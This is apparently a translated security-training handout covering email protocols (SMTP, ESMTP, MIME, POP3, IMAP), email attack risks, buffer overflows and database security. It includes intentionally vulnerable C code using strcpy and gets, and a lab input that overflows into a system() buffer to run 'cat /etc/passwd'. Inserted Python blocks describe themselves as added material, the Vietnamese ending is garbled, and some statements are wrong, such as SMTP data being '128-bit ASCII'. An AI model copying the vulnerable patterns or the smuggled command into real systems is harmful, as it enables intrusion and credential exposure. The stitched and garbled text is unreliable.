Copyright by Tocbatdat


MIME and SMTP. MIME (Multipurpose Internet Mail Extensions) adds capability to SMTP, allowing files in multimedia encodings to accompany a standard SMTP message. MIME uses the Base64 encoding to convert complex file formats into ASCII for transfer. MIME is an open standard now supported by most applications, and you should replace your mail program if it does not support MIME. MIME is specified in RFC 2045-2049.

S/MIME is an extension of MIME that supports encrypted messages. S/MIME is based on RSA public-key cryptography and keeps a message from being read or intercepted by a third party.

SMTP commands. Put simply, SMTP uses short commands to control a message. The table below lists the SMTP commands, which are defined in RFC 821.

HELO  Hello. Used to identify the sender of the mail. The command is accompanied by the name of the sending host. In ESMTP (the extended protocol) this command becomes EHLO.
MAIL  Initiates a mail transaction. Combined with "from", it identifies the sender of the mail.
RCPT  Identifies the recipient of the mail.
DATA  Signals the start of the actual content of the message (the message body). The data is encoded as 128-bit ASCII and ends with a line containing only a period (.).
RSET  Aborts the mail transaction.
VRFY  Used to verify the recipient.
NOOP  The "no operation" command; performs no action.
QUIT  Exits the process, ending the session.
SEND  Tells the receiving host that the mail must be sent to another terminal.

Extended SMTP (ESMTP). SMTP has been improved continually to meet users' growing needs and is a very useful protocol. Nevertheless the SMTP standard needed to be extended, and RFC 1869 was issued to supplement SMTP. It not only extends SMTP but also adds needed features to the existing commands. For example, the SIZE command is an extension that lets the receiver limit the size of incoming messages; without ESMTP the message size cannot be limited.

When a system connects to an MTA, it initiates ESMTP by using EHLO in place of HELO. If the MTA supports extended SMTP (ESMTP) it replies with the list of commands it supports. If not, it replies with an error code (500 Command not recognized) and the sending host falls back to SMTP. The following is an ESMTP session:

220 esmtpdomain.com Server ESMTP Sendmail 8.8.8+Sun/8.8.8; Thu, 22 Jul 1999 09:43:01
EHLO host.sendingdomain.com
250-mail.esmtpdomain.com Hello host, pleased to meet you
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP
QUIT
221 Goodbye host.sendingdomain.com

SMTP headers. A lot of useful information can be obtained by examining a message's headers. Not only can you see where the message came from, its subject, the date sent and the recipients; you can also see the points the message passed through before it reached your mailbox. RFC 822 specifies what the header contains. At a minimum it holds the sender (From), the date sent and the recipients (To, Cc, or Bcc).
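The header walk in the next subsection reads the Received: lines by hand. The script below is an added example, not code from the original training document: it parses the Received: chain of a constructed message (hosts in example.test, placeholder ids, modelled on the page's two-hop example), lists the hops in delivery order and computes the delay each hop claims, so that a clock mismatch between two hosts shows up as a negative delay.

```python
"""Walk the Received: chain of a message and measure the delay at each hop.

Added example, not code from the original training document. The message
below is constructed for the demo (hosts in example.test, placeholder ids)
and mirrors the two-hop walk shown in the text, including the clock mismatch
between the two hosts.
"""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed sample message; header layout follows RFC 822.
SAMPLE_MESSAGE = """\
Received: from host1.example.test by host2.example.test (8.8.8+Sun/8.8.8)
 with ESMTP id LAA21968 for <user@host2.example.test>;
 Sat, 31 Jul 1999 11:33:00 -0400 (EDT)
Received: by host1.example.test with Internet Mail Service (5.0.1460.8)
 id <placeholder-1>; Sat, 31 Jul 1999 11:34:39 -0400
Message-ID: <placeholder-2@host1.example.test>
From: "Your Friend" <someone@example.test>
To: "user@host2.example.test" <user@host2.example.test>
Subject: Hello There
Date: Sat, 31 Jul 1999 11:34:36 -0400

Hello there.
"""

FROM_HOST = re.compile(r"\bfrom\s+(\S+)")
BY_HOST = re.compile(r"\bby\s+(\S+)")


def parse_received(value):
    """One Received: value -> (sending host or None, receiving host, timestamp).

    The date is whatever follows the last ';'; the clauses before it name
    the hosts. Folded header lines are covered by the \\s+ in the patterns.
    """
    clauses, _, stamp = value.rpartition(";")
    sender = FROM_HOST.search(clauses)
    receiver = BY_HOST.search(clauses)
    return (sender.group(1) if sender else None,
            receiver.group(1) if receiver else None,
            parsedate_to_datetime(stamp.strip()))


def received_chain(raw_message):
    """Hops in delivery order, oldest first (each MTA prepends its own header)."""
    msg = message_from_string(raw_message)
    return [parse_received(v) for v in reversed(msg.get_all("Received", []))]


def hop_delays(raw_message):
    """(receiving host, seconds since the previous hop) for every hop after the first.

    A negative number means the two hosts' clocks disagree, as in the text's
    example, so the timestamps alone cannot be trusted for ordering.
    """
    chain = received_chain(raw_message)
    return [(later[1], int((later[2] - earlier[2]).total_seconds()))
            for earlier, later in zip(chain, chain[1:])]


def origin_host(raw_message):
    """The first host that handled the message, i.e. the oldest Received: line."""
    chain = received_chain(raw_message)
    return chain[0][1] if chain else None
```

Only the oldest Received: line was written by a host the sender controls; every later line was added by a relay, which is why the chain is read from the bottom up. In the sample, host2 reports 11:33:00 while host1 reports 11:34:39, so hop_delays() returns -99 seconds for the host1 to host2 hop, the unsynchronised-clock case the text describes.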


The headers of a received message let you see where the message travelled before reaching your mailbox. They are a very useful tool for checking and troubleshooting. Here is an example:

From someone@mydomain.COM Sat Jul 31 11:33:00 1999
Received: from host1.mydomain.com by host2.mydomain.com (8.8.8+Sun/8.8.8) with ESMTP id LAA21968 for ; Sat, 31 Jul 1999 11:33:00 -0400 (EDT)
Received: by host1.mydomain.com with Interne Mail Service (5.0.1460.8) id ; Sat, 31 Jul 1999 11:34:39 -0400
Message-ID:
From: "Your Friend"
To: "'jamisonn@host2.mydomain.com'"
Subject: Hello There
Date: Sat, 31 Jul 1999 11:34:36 -0400

In the example above you can see that the message was sent from someone@mydomain.com. From mydomain.com it was passed to host1. The message was then sent from host1 to host2 and delivered to the user. Each time the message stops, the receiving host is required to add information to the header, including the date and time of the stop. Host2 reports that it received the message at 11:33:00. Host1 reports that it received the message at 11:34:36; the discrepancy of more than a minute is probably due to the clocks of the two hosts not being synchronised.

Advantages and disadvantages of SMTP. Like X.400, SMTP has a number of advantages and disadvantages. The advantages include:
- SMTP is very widespread. It is supported by many organisations.
- SMTP has a low cost of administration and maintenance.
- SMTP has a simple address structure.
The disadvantages include:
- SMTP lacks some functions.
- SMTP lacks security capabilities like those of X.400.
- It is limited to the simplest features.

a.3 Introduction to POP and IMAP

In the early days of electronic mail, users were required to log in to the mail server and read their messages there. Mail programs were text-based and not very user-friendly. To solve this, protocols were developed that let users download mail to their own machine or use friendlier interfaces, and this is what made electronic mail popular. The two most widely used protocols today are POP (Post Office Protocol) and IMAP (Internet Mail Access Protocol).

Post Office Protocol (POP). POP lets a user with an account on the mail server connect to the MTA and download mail to their own computer, where it can be read and replied to. POP was first developed in 1984 and was upgraded from POP2 to POP3 in 1988; today most users use the POP3 standard. POP3 connects over TCP/IP to the mail server (using port 110). The user enters a username and password. After authentication, the client uses POP3 commands to retrieve or delete mail. POP3 is only a protocol for retrieving mail from the mail server. POP3 is specified in RFC 1939.

POP3 commands:
USER  Specifies the username
PASS  Specifies the password
STAT  Requests the status of the mailbox, such as the number of messages and their size
LIST  Lists the messages
RETR  Retrieves a message
DELE  Deletes a specified message
NOOP  Does nothing
RSET  Restores (rolls back) deleted messages
QUIT  Commits the changes and exits

Internet Mail Access Protocol (IMAP). POP3 is a very useful and very simple protocol for retrieving mail for the user. Its simplicity, however, also means it lacks some necessary functions. For example, POP3 only works in offline mode, meaning that mail is downloaded and then deleted from the server. IMAP fills in POP3's shortcomings. IMAP was developed in 1986 at Stanford University. IMAP2 was developed in 1987. IMAP4, the latest version in use, was accepted by the Internet standards bodies in 1994. IMAP4 is specified in RFC 2060 and uses TCP port 143.

IMAP4 commands:
CAPABILITY    Requests the list of supported functions
AUTHENTICATE  Specifies the use of authentication from another server
LOGIN         Supplies the username and password
SELECT        Selects a mailbox
EXAMINE       Opens a mailbox read-only
CREATE        Creates a mailbox
DELETE        Deletes a mailbox
RENAME        Renames a mailbox
SUBSCRIBE     Adds to the active list
UNSUBSCRIBE   Removes from the active list
LIST          Lists mailboxes
LSUB          Shows the list of users of the mailbox
STATUS        Status of the mailbox (number of messages, ...)
APPEND        Adds a message to the mailbox
CHECK         Requests a mailbox checkpoint
CLOSE         Performs deletions and exits the mailbox
EXPUNGE       Performs deletions
SEARCH        Searches the mailbox for specified messages
FETCH         Searches within the content of a message
STORE         Changes the content of messages
COPY          Copies a message to another mailbox
NOOP          Does nothing
LOGOUT        Closes the connection

Comparing POP3 and IMAP4. There are many differences between POP3 and IMAP4. Depending on the users, the MTA and the requirements, POP3, IMAP4 or both may be used.
The benefits of POP3 are:
- It is very simple.
- It is very widely supported.
Because it is so simple, POP3 has many limitations. For example, it supports only a single mailbox, and mail is deleted from the mail server once it has been downloaded.
IMAP4 has other benefits:
- Strong authentication support.
- Support for multiple mailboxes.
- In particular, support for working online, offline or disconnected.
IMAP4's online mode supports retrieving a set of messages from the server, searching for and fetching the message needed, and so on. IMAP4 also lets users move mail from one folder on the server to another, or delete mail. IMAP4 is well suited to users who travel and have to work from different computers.

b. Risks of attack when using email

b.1 The lack of security in the email system
Webmail: if the connection to the webmail server is not secure (for example the address is http:// rather than https://), then all information, including the username and password, is unencrypted as it travels from the webmail server to the computer.
SMTP: SMTP does not encrypt messages. Every connection between SMTP servers carries your message in clear text for any eavesdropper to read. In addition, if the email server requires you to send a username and password to log in to the SMTP server in order to relay a message to another server, all of that is also sent in clear text and is a target for eavesdropping. Finally, messages sent by SMTP include information about the computer they were sent from and the email program used. This information is available to every recipient and may be of a personal nature.
POP and IMAP: the POP and IMAP protocols require you to send a username and password to log in, neither of which is encrypted. Thus your messages can be read by anyone who is sniffing traffic on your computer's network or at your email provider.
Backups: messages are stored on the SMTP server in clear text, unencrypted. Backups of the server's data can be made at any time, and an administrator can read any data on the machine.

b.2 Risks during email transmission
Eavesdropping: the Internet is a big place with a lot of people. It is easy for someone to get access to a computer or network segment that your information is travelling over, capture it and read it. Just like someone in the next room listening in on your telephone conversation, a hacker can use man-in-the-middle tools to capture all of an email user's packets. This can be done easily with programs such as Cain&Abel, Ettercap, and so on.
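The SMTP model in a.2, the command table and the ESMTP extension list above, and the clear-text credential risk just described can be seen together in one small receiver. The following is an added example, not code from the original training document or from any mail server: a state machine for the receiving side that walks the MAIL, RCPT, DATA and "." steps with the numeric replies, advertises extensions on EHLO, and refuses an AUTH command (that is, a password) until STARTTLS has been negotiated. The domain names, the local mailbox list and the SIZE limit are constructed values.

```python
"""Receiver side of the SMTP model described above, as a small state machine.

Added example, not code from the original training document. It mirrors the
MAIL -> RCPT -> DATA -> "." exchange and the numeric replies, advertises ESMTP
extensions on EHLO, and refuses AUTH (a password) until STARTTLS has been
negotiated, which is the clear-text credential risk discussed in b.1.
Domain names, the local mailbox and the size limit are constructed values.
"""

LOCAL_DOMAIN = "mail.esmtpdomain.test"           # constructed
LOCAL_MAILBOXES = {"jamisonn@esmtpdomain.test"}  # constructed
MAX_MESSAGE_SIZE = 10_000_000                    # constructed SIZE limit


def extract_path(arg):
    """'FROM:<a@b>' or 'TO:<a@b>' -> 'a@b'; a bare address is accepted too."""
    if ":" in arg:
        arg = arg.split(":", 1)[1]
    return arg.strip().strip("<>").lower()


class SmtpReceiver:
    def __init__(self):
        self.client = None          # set by HELO/EHLO
        self.tls_active = False     # set by STARTTLS
        self.authenticated = False  # set by AUTH, which is allowed only over TLS
        self.in_data = False
        self.delivered = []         # (reverse_path, forward_paths, body) per message
        self._reset()

    def _reset(self):
        self.reverse_path, self.forward_paths, self.body = None, [], []

    def handle(self, line):
        """Process one client line and return the server reply ("" while inside DATA)."""
        if self.in_data:
            if line == ".":                       # end of the message data
                self.in_data = False
                self.delivered.append(
                    (self.reverse_path, self.forward_paths, "\n".join(self.body)))
                self._reset()
                return "250 OK: message accepted"
            self.body.append(line[1:] if line.startswith("..") else line)  # un-stuff
            return ""
        verb, _, arg = line.partition(" ")
        handler = getattr(self, "cmd_" + verb.upper(), None)
        return "500 Command not recognized" if handler is None else handler(arg.strip())

    def cmd_HELO(self, arg):
        self.client = arg
        return f"250 {LOCAL_DOMAIN} Hello {arg}"

    def cmd_EHLO(self, arg):
        self.client = arg
        # STARTTLS is offered on the clear channel; AUTH is offered only once TLS is on.
        exts = [f"SIZE {MAX_MESSAGE_SIZE}", "8BITMIME",
                "AUTH PLAIN LOGIN" if self.tls_active else "STARTTLS"]
        lines = [f"250-{LOCAL_DOMAIN} Hello {arg}"] + [f"250-{e}" for e in exts]
        lines[-1] = "250 " + lines[-1][4:]      # last line carries "250 " not "250-"
        return "\r\n".join(lines)

    def cmd_STARTTLS(self, arg):
        self.tls_active = True   # a real server wraps the socket in TLS here
        return "220 Ready to start TLS"

    def cmd_AUTH(self, arg):
        if not self.tls_active:  # never read a password off the clear channel
            return "530 Must issue a STARTTLS command first"
        self.authenticated = True
        return "235 Authentication successful"

    def cmd_MAIL(self, arg):
        if self.client is None:
            return "503 Send HELO/EHLO first"
        self.reverse_path = extract_path(arg)   # reverse-path: who the mail is from
        return "250 OK"

    def cmd_RCPT(self, arg):
        if self.reverse_path is None:
            return "503 Need MAIL command first"
        addr = extract_path(arg)                # forward-path: who the mail is to
        if addr not in LOCAL_MAILBOXES and not self.authenticated:
            return "550 Relay denied"           # relay only for authenticated clients
        self.forward_paths.append(addr)
        return "250 OK"

    def cmd_DATA(self, arg):
        if not self.forward_paths:
            return "503 Need RCPT command first"
        self.in_data = True
        return "354 Start mail input; end with <CRLF>.<CRLF>"

    def cmd_RSET(self, arg):
        self._reset()
        return "250 OK"

    def cmd_NOOP(self, arg):
        return "250 OK"

    def cmd_VRFY(self, arg):
        # Non-committal answer so that mailbox names cannot be enumerated via VRFY.
        return "252 Cannot VRFY user, but will accept message"

    def cmd_QUIT(self, arg):
        return f"221 {LOCAL_DOMAIN} Goodbye"


def run_session(commands):
    """Feed client lines to a fresh receiver; return ([(command, reply)], receiver)."""
    srv = SmtpReceiver()
    return [(c, srv.handle(c)) for c in commands], srv
```

Two policy choices are the point of the example: a 550 for RCPT to a non-local address unless the client has authenticated, which is the open-relay check, and a 530 for AUTH before STARTTLS, so the receiver never invites the client to send a password over the clear channel described in b.1.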


Countering eavesdropping:
- To prevent eavesdropping, we should encrypt information while it is being carried over the Internet to the mail server. On the server too, the information should be encrypted for safe storage, using a secret key known only to the genuine recipient.

Identity theft: if someone can obtain the username and password you use to access the email server, they can read your mail and send mail as you. Typically this information is obtained by eavesdropping on an SMTP, POP, IMAP or webmail connection, or by reading a message in which you included it.
Countering identity theft:
- To counter identity theft we need to create a private, confidential and secure exchange by sending personal information and message content in encrypted form as it crosses the Internet. For example, MyMail uses Secure Socket Protocol links to reduce the incidence of identity theft.

Invasion of privacy: if you are very concerned about your private information, you should consider the possibility that your backups are not protected. You may also be concerned that others can learn the IP address of your computer. This information can be used to identify the city you live in or, in some cases, even to find your address. This does not happen with webmail, POP or IMAP, but with SMTP it can.
Countering invasion of privacy:
- All information is protected by being encrypted with a secret key before storage; to read mail, the recipient has to enter their exact username and password.
- Hide the IP address in the message header; this protects personal information such as the city or state you live in.
- Encrypt all stored email content, and encrypt it in transit as well.

Message modification: anyone with administrator rights on any SMTP server your message passes through can not only read your message but can also delete or alter it before it continues on its way. Your recipient has no way to tell whether your message was altered, and if the message was deleted they cannot know that a message was sent to them at all.
Countering message modification:
- When email arrives at the mail server it should be stored encrypted with a private secret key, so that even someone with administrator rights on the server cannot alter the email's content.
- Furthermore, we must prevent the system administrator from gaining access to an email account simply by resetting it and creating a new password.

4. Securing remote access
This part is covered in section 2 of the Network Infrastructure Security document.

5. The buffer overflow vulnerability and how to prevent it
a. Theory
In computer security and programming, a buffer overflow is a programming error that can cause a memory access exception and terminate the program or, when the user is malicious, can be exploited to breach system security. A buffer overflow is an anomalous condition in which a process stores data beyond the boundaries of a fixed-length buffer. As a result, the data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow control data. Buffer overflows can cause a process to crash or to produce incorrect results. They can be triggered by specially crafted input designed to execute malicious code or to make the program behave in unintended ways. In this way buffer overflows are the source of many software vulnerabilities and form the basis of many exploits. Adequate bounds checking by the programmer or the compiler can prevent buffer overflows.
b. Technical description
A buffer overflow occurs when data is written to a buffer and, because bounds are not checked adequately, spills over into adjacent memory and corrupts the data values at the memory addresses next to the buffer. This happens most often when copying a string from one buffer to another.

c. Basic example
In the following example, a program defines two data items adjacent in memory: A, an 8-byte string buffer, and B, a 2-byte integer. Initially A contains only zero bytes and B contains the value 3. Characters are 1 byte in size. Now the program writes the string "excessive" into buffer A, followed by a zero byte marking the end of the string. Because the string length is not checked, the new string overwrites the value of B: although the programmer did not intend to modify B, B's value has been replaced by a number formed from the end of the string. In this example, on a big-endian system using ASCII, the character "e" followed by a zero byte becomes the number 25856. If B is the last data item among the variables defined by the program, writing an even longer string, past the end of B, could cause an error such as a segmentation fault and terminate the process.

d. Stack buffer overflow
Besides modifying unrelated variables, buffer overflows are often exploited by attackers to make a running program execute arbitrary code supplied to it. The techniques by which an attacker takes control of a process depend on the memory region in which the buffer lies. An example is the stack region, where data can be temporarily "pushed" onto the "top" of the stack and later "popped" to read a variable's value. Usually, when a function begins executing, its temporary data items (local variables) are pushed, and the program can access them for the duration of the function. Besides stack overflows there are also heap overflows.
In the following example, "X" is data that happens to be on the stack when the program starts; the program then calls function "Y", which requires a small amount of memory for itself; then "Y" calls function "Z", which requires a large buffer: if function "Z" overflows its buffer, it can overwrite data belonging to function Y or to the main program. This is particularly serious on most systems: besides ordinary data, the stack also stores the return address, i.e. the location in the program that was executing before the current function was called. When the function finishes, its temporary memory is removed from the stack and execution is handed back to the return address. Thus, if the return address is overwritten by a buffer overflow, it will point somewhere else. In an unintentional overflow like the first example, that location is almost certainly invalid and contains no program instruction, so the process crashes. An attacker, however, can adjust the return address to point to a chosen location in order to compromise system security.

e. Example source code
The C source below illustrates a common programming error. Once compiled, the program produces a buffer overflow if it is called with a command-line argument that is too long, since that argument is written into a buffer without its length being checked.

************
/* overflow.c - demonstrates a buffer overflow */
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];
    if (argc < 2)
    {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    strcpy(buffer, argv[1]);   /* no length check: the bug the text describes */
    return 0;
}
************

Strings of no more than 9 characters will not overflow the buffer. Strings of 10 or more characters will overflow it: this is always a bug, but it does not always make the program run incorrectly or cause segmentation faults.

The program above can be rewritten safely using strncpy as follows:

********
/* better.c - demonstrates one method of fixing the problem */
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];
    if (argc < 2)
    {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    strncpy(buffer, argv[1], sizeof(buffer));   /* copies at most 10 bytes */
    buffer[sizeof(buffer) - 1] = '\0';          /* strncpy does not always terminate */
    return 0;
}
*******

f. Exploitation
There are different techniques for exploiting buffer overflows, depending on the computer architecture, the operating system and the memory region. For example, exploitation on the heap (used for dynamically allocated variables) is very different from exploiting variables on the stack.

Exploiting stack buffer overflows. A technically skilled and malicious user can exploit stack buffer overflows to manipulate a program in one of the following ways:
- Overwriting a local variable near the buffer on the stack to change the program's behaviour in the attacker's favour.
- Overwriting the return address in a stack frame. When the function returns, execution continues at the address the attacker specified, usually a buffer holding user input.
- If the address of the user-supplied data is unknown but is known to be held in a register, the return address can be overwritten with the address of an opcode that makes execution jump to the user data. Specifically, if the address of the malicious code is in register R, a jump to the location holding the opcode for jump R, call R (or a similar instruction that jumps to the address in R) will cause the code in the user data to execute. Addresses of suitable opcodes or bytes can be found in dynamic-link libraries (DLLs) or in the executable itself. However, the opcode address usually must not contain a null character (zero byte), and the addresses of these opcodes can differ between applications and operating system versions. The Metasploit project is one database of suitable opcodes, although it lists only opcodes for Microsoft Windows.

Exploiting heap buffer overflows. A buffer overflow occurring in the heap data area is called a heap overflow and is exploitable by techniques different from those for stack overflows. Heap memory is allocated dynamically by applications at run time and usually holds program data. Exploitation is performed by corrupting this data in specific ways so as to make the application overwrite internal structures such as linked-list pointers. The Microsoft JPG GDI+ vulnerability is a recent example of the danger a heap overflow poses.

Obstacles to exploitation. Processing the buffer before reading or executing it can defeat attempts to exploit a buffer overflow. Such processing can reduce the threat of exploitation but may not prevent it absolutely. It can include converting upper case to lower case, removing metacharacters and filtering out strings that contain non-alphanumeric characters. However, there are techniques for evading such filtering and processing: alphanumeric code, polymorphic code, self-modifying code and return-to-libc attacks. The same methods can be used to evade detection by intrusion detection systems.

g. Preventing buffer overflows
Many varied techniques with different advantages and disadvantages are used to detect or prevent buffer overflows. The most reliable way to avoid or prevent buffer overflows is to use automatic protection at the programming-language level. However, this kind of protection cannot be applied to legacy code, and technical, business or cultural constraints often call for an unsafe language. The following sections describe the available choices and implementations.

Choice of programming language. The choice of programming language can have a profound effect on the occurrence of buffer overflows. In 2006 C and C++ were among the most popular programming languages, with a vast amount of software written in them. C and C++ provide no built-in protection against accessing or overwriting data in any part of memory through invalid pointers; specifically, they do not check that data written to an array (the implementation of a buffer) lies within the bounds of the array. Note, however, that the standard C++ libraries, the Standard Template Library (STL), provide many safe ways to store data in buffers, and C programmers can create and use similar utilities. As with any other feature of C or C++, each programmer must decide whether to accept the cost in program speed in exchange for the potential benefit (program safety).
Some C variants, such as Cyclone, help prevent buffer overflows further by, for example, attaching size information to arrays. The D programming language uses a variety of techniques to avoid almost all use of pointers and user-defined bounds checking.


Many other programming languages provide run-time checking that raises a warning or an exception where C or C++ would overwrite data. Examples of such languages range from Python to Ada, from Lisp to Modula-2, and from Smalltalk to OCaml. The Java and .NET bytecode environments also require bounds checking on all arrays. Almost all interpreted languages protect a program against buffer overflows by signalling a well-defined error. Often, when a language provides enough type information to perform bounds checking, it lets the programmer enable or disable it. Static analysis can remove many dynamic type and bounds checks, but poor implementations and awkward cases can reduce performance considerably. Software engineers must carefully weigh the safety cost against the performance cost when deciding which language to use and how to configure the compiler.

Using safe libraries. The buffer overflow problem is common in C and C++ because they expose the low-level representation of buffers as containers for data types. Buffer overflows must therefore be avoided by maintaining a high degree of correctness in the parts of the program that perform buffer management. Using well-written, tested libraries of abstract data types that perform buffer management automatically, including bounds checking, can reduce the occurrence and impact of buffer overflows. In these languages, strings and arrays are the two main data types in which buffer overflows occur; libraries that prevent overflows in these types can therefore provide the bulk of the necessary coverage. Still, incorrect use of safe libraries can lead to buffer overflows and other vulnerabilities, and of course any bug in the library itself is a vulnerability too. "Safe" library implementations include The Better String Library, Arri Buffer API and Vstr. The OpenBSD C library provides the useful strlcpy and strlcat functions, but these are much more limited than full safe-library implementations. In September 2006, Technical Report 24731 of the C standards committee was published; it describes a set of new functions based on the standard C library's I/O and string functions, to which buffer-size parameters have been added.

Protecting the stack from buffer overflows. Stack-smashing protection is the technique used to detect the most common buffer overflows. It checks whether the stack has been modified when a function returns. If it has, the program terminates with a segmentation fault. Systems using this technique include Libsafe, StackGuard and the ProPolice patches. Microsoft's Data Execution Prevention mode also protects the pointers to the SEH exception handler from being overwritten.


The stack can be protected further by splitting it into two parts, one for data and one for function returns. This division is used in the Forth programming language, although it was not a design decision made on security grounds. In any case it is not a complete solution to buffer overflows, since sensitive data other than the return address can still be overwritten.

Executable space protection. Executable space protection is another approach to preventing buffer overflows. This technique prevents the execution of code on the stack or the heap. An attacker may use a buffer overflow to inject arbitrary code into a program's memory, but with executable space protection any attempt to run that code raises an exception. Some CPUs support a feature called the NX ("No eXecute") bit or the XD ("eXecute Disabled") bit. Combined with software, these features can be used to mark data pages (such as those holding the stack and the heap) as readable but not executable. Some Unix operating systems (for example OpenBSD and Mac OS X) ship with executable space protection. Optional packages include: PaX, Exec Shield, Openwall. Newer variants of Microsoft Windows also support executable space protection, under the name Data Execution Prevention. Add-on products include: SecureStack, OverflowGuard, BufferShield, StackDefender. Executable space protection does not protect against return-to-libc attacks.

Address space layout randomization. Address space layout randomization (ASLR) is a computer security feature that arranges the positions of key data areas (usually including the base of the executable and the positions of libraries, the heap and the stack) randomly in a process's address space. Randomising the virtual memory addresses at which functions and variables sit makes exploiting a buffer overflow harder, though not impossible. It also forces the attacker to tailor the exploit to each specific system, which foils the attempts of Internet worms. A similar but less effective method is rebasing processes and libraries in the virtual address space.

Deep packet inspection. Deep packet inspection (DPI) can detect remote attempts to exploit buffer overflows right at the network perimeter. These techniques are able to block packets that contain the signature of a known attack or a long series of No-Operation (NOP) instructions; such sequences are commonly used when the location of the attack's payload varies slightly.


Scanning packets is not an effective method, because it can only block known attacks, and there are many ways to encode a NOP instruction. Attackers can use alphanumeric, metamorphic and self-modifying shellcode to evade detection by packet scanning.

h. Practical exercise
Boot Linux from a CD, then write a piece of code with the following content:

#include <stdio.h>
#include <stdlib.h>   /* malloc, system */
#include <stdint.h>   /* uintptr_t, for printing the addresses */

int main(void)
{
    char *name;
    char *dangerous_system_command;

    name = (char *) malloc(10);
    dangerous_system_command = (char *) malloc(128);

    /* The demo prints the two heap addresses as decimal integers to show
       that the command buffer sits just after the name buffer. */
    printf("Address of name is %d\n", (int)(uintptr_t) name);
    printf("Address of command is %d\n", (int)(uintptr_t) dangerous_system_command);

    sprintf(dangerous_system_command, "echo %s", "Hello world!");
    printf("What's your name?");
    gets(name);                       /* unbounded read: the overflow under study */
    system(dangerous_system_command);
    return 0;
}

Save the code as a text file and compile it with gcc:

root@1[Desktop]# gcc buffer.c -o buffer
buffer.c:13:2: warning: no newline at end of file
/tmp/ccefevDP.o(.text+0x82): In function `main':
: warning: the `gets' function is dangerous and should not be used.
root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?hao
Hello world!
root@1[Desktop]# ./buffer
Address of name is 134520840
Address of command is 134520856
What's your name?1234567890123456cat /etc/passwd

V. DATA SECURITY

1. Database security
The database of an agency, an enterprise, a sector and so on is usually installed centrally or distributed across servers on the network, and is a shared information resource used by many people. Database systems therefore need mechanisms to control and manage access to and use of the information so that the data remains secure and intact. The term data security means that database systems must be protected against access intended to modify or destroy them, whether deliberate or accidental. Database systems must therefore be administered and protected centrally so as to ensure data integrity and security. Data integrity is different from data security, although the two are closely related and some measures serve both.

There are many threats to data systems:
- Databases are installed centrally or distributed across different geographical locations, and are accessed from different terminals in client/server mode.
- Many users access and work on the same database.
- Many kinds of data are downloaded and kept on local machines for use.
- Databases are accessed through many different data manipulation languages and application systems over the same information content.
Consequently the following can occur:
- Unintended errors when inserting, updating or deleting, or due to programming mistakes.
- Unauthorised access with malicious intent: modifying, deleting or stealing information, and so on.
- Technical faults such as device failures, programming errors, and so on.
Data stored in a database must be protected against unauthorised access and against deliberate or accidental damage when information in the database is updated, modified or added. Measures are needed to guard against entering inconsistent data, which seriously affects data integrity.

a. S vi phm an ton c s d liu.


Cc dng truy cp c ch nh bao gm : Khng cho php c d liu. Khng cho php sa i d liu. Khng cho php ph hu d liu... Vn an ton c s d liu cp n vic bo v chng li s truy cp c ch nh. Vic bo v tuyt i cc h c s d liu khi truy nhp l khng th, nhng phi c cc bin php mnh ngn chn hu ht truy cp tri php vo c s d liu. b. Cc mc an ton c s d liu. bo v c s d liu, phi thc hin cc bin php m bo an ton mt vi mc bo v nh sau: Mc an ton h thng c s d liu: Ty thuc vo yu cu ca ngi s dng m ngi qun tr c s d liu cp php truy nhp mt phn vo c s d liu. Nhng ngi s dng khc c th c php thc hin cc cu hi truy vn, nhng c th b ngn cm nh sa i d liu. Mc an ton h thng iu hnh: .Mc h thng kim sot ton b mc iu hnh h thng. Vn an ton mc h thng iu hnh s c m bo bi mc an ton h thng c s d liu. An ton trong h iu hnh c tin hnh ti nhiu cp t sp xp cc mt m Page | 195 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

truy cp vo h thng cho ti s c lp cc qu trnh ang cng x l trong h thng. Tp h thng cng cung cp mt s cp bo v. S tham kho nhng ch trong th mc l bao qut ca nhng ch ny trong cc bi hc v h thng iu hnh. An ton mc mng. Hu ht cc h thng c s d liu u cho php truy cp t xa thng qua cc thit b u cui. An ton d liu mc mng l chng n cp thng tin, sao chp thng tin v sa i ni dung thng tin trn ng truyn. Vn an ton cp mc mng t c nhiu kt qu, ng dng ph bin trn mng Internet. Danh sch cc ch trong th mc bao qut nn tng nguyn l ca vn an ton mng. Nhn din ngi s dng: T nh ngha an ton d liu c th suy ra rng, h qun tr c s d liu DBMS khng cho php ngi s dng c thc hin mt thao tc no nu khng c php ca ngi qun tr CSDL. Ngi qun tr CSDL phi: Xc nh cho h thng nhng thao tc m ngi s dng c php thc hin. Cung cp mt phng tin cho ngi s dng h thng nhn bit h. Ni chung ngi s ng u c trao nhng quyn khc nhau. Nhng quyn ny c th bo m quyn c mt s phn ca c s d liu, quyn chn thm, xa hay sa i d liu. Hnh thc thng dng nht nhn ra ngi s dng l mt khu, v ch c h thng v ngi s dng bit. Mt khu cng c h thng bo v nh bo v d liu. Bo v mc vt l: Mt m hnh bo v ng tin cy cng c kh nng b tn cng vo c s d liu, t vic ph c mt khu n vic nh cp cc thit bi. C th chng nh cp kh hiu qu bng cch m ha, che du d liu. Mt h thng c bo mt cao cn phi c nhng phng thc nhn din khc tt hn mt khu, nh nhn din tng ngi s dng qua mt nhn vin bo v, hoc kt vi cc quy nh v hnh chnh... Kim tra truy nhp: Vi mi ngi s dng h thng s qun l mt h s c pht sinh t vic cc chi tit v th tc xut trnh, xc minh v cc chi tit c quyn thao tc m ngi qun tr c s d liu cp cho ngi s dng. H thng s kim tra tnh php l ca mi mt thao tc ca ngi s dng. V d yu cu c c li nh gi hng nm ca mi mt nhn vin, ch c th c php nu c s d liu c cha thng tin quy nh rng ngi yu cu phi l Gim c, trng, ph phng t chc, chnh vn phng. Tt c cc i tng khc khng c trong c s d liu khng c php truy xut. DBMS s kim tra mi mt thao tc ca ngi s dng xem c vi phm cc rng buc an ton hay khng, nu c s phi hu b. 
